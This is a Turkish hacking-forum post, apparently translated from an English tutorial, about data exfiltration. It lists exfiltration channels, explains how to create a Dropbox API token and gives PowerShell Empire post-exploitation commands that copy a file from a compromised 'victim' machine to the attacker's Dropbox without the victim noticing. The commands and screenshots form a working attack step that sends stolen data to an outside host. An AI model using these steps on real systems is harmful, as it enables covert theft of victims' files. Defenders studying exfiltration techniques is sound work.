PowerShell Empire Kullanarak Veri Sızdırma

Tommy Angelo

Yeni üye
25 Nis 2020
19
0
Veri Sızdırma Nedir?

Veri sızdırma, kötü amaçlı bir yazılım ve\veya kötü amaçlı bir aktör, bir bilgisayardan yetkisiz veri aktarımı gerçekleştirince oluşur.Buna ayrıca veri ekstrüzyonu veya veri ihracatı da denir.Veri ekstrüzyonu da bir veri hırsızlığıdır. Son yıllarda veri sızdırma çabaları, işletmecilerin tüketici güvenine, kurumsal değerlemesine, fikri mülkiyetine, dünya çapında da hükümetlerin ulusal güvenliğine zarar verdi.

0.png


Veri Sızdırma Yöntemleri

Açık Yöntemler:

  • HTTP/HTTPS Download ve Upload'ları
  • FTP
  • Email
  • Anlık Mesajlaşma
  • P2P Dosya Paylaşımı

Gizli Yöntemler:

  • SSH
  • VPN
  • Protocol Tunneling
  • Bulut Depolama Upload'ları
  • Steganografi
  • Timing channel

(Wikipedia'dan)​

Dropbox API Üzerinden Token Oluşturmak

Bunu yapmak için, bu tool bir Dropbox API gerektiriyor. Bunun için önce bir Dropbox hesabı oluşturun. Hesabı oluşturduktan sonra geliştirici tool'larına gidin. Aşağıdakine benzer bir web sayfası açılacaktır. Dropbox API'ı seçeceğiz. Daha sonra, erişim türü bölümünde "Uygulama Klasörü"'nü seçeceğiz. Uygulamayı her seçimde adlandırın. Devam etmek için "Uygulama Oluşturma Butonu"'na tıklayın

1.jpg


Bu sizi aşağıdakine benzer başka bir siteye yönlendirecektir. O Auth 2 bölümüne gidin ve erişim için bir token oluşturun. Oluşturulan erişim token'i, bu belirli pratik için gerekli olan Dropbpx API'ını verecek. Şimdi o oluşturulan token'i kopyalayın.

2.jpg


Veri Sızdırma

PowerShell Empire'ı veri sızdırmak için kullanacağız, ki zaten hedef, makinesini tehlikeye attığımızın ve içerden veri kopyaladığımızın farkına varmadan görevimizi tamamlamak üzereyiz. Görebileceğiniz gibi Empire-agent'a sahibiz. Bu demektir ki zaten kurbanın makinesinin shell'ini oluşturmuşum ve yukarıdaki token'i veri sızdırması için Empire'ın post exploit'inde kullanabiliriz.

Kod:
usemodule exfiltration/exfil_dropbox
set SourceFilePath C:\Users\raj\Desktop\notes.txt
set TargetFilePath /Apps/notes.txt
set ApiKey <API Token>
execute

3.png


/my files'ın içinde notes.txt'nin olduğunu görebilirsiniz, bu da verileri bir kaynak konumdan hedefe başarıyla aktardığımız anlamına geliyor.

4.jpg


Böylece, bu şekilde, kurbanın makinesinden verileri Dropbox'ımıza başarıyla aktardık ve dolayısıyla bu teknik Dropbox Sızdırması olarak bilinir.​





kaynak:https://www.turkhackteam.org/intern...ata-exfiltration-using-powershell-empire.html
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.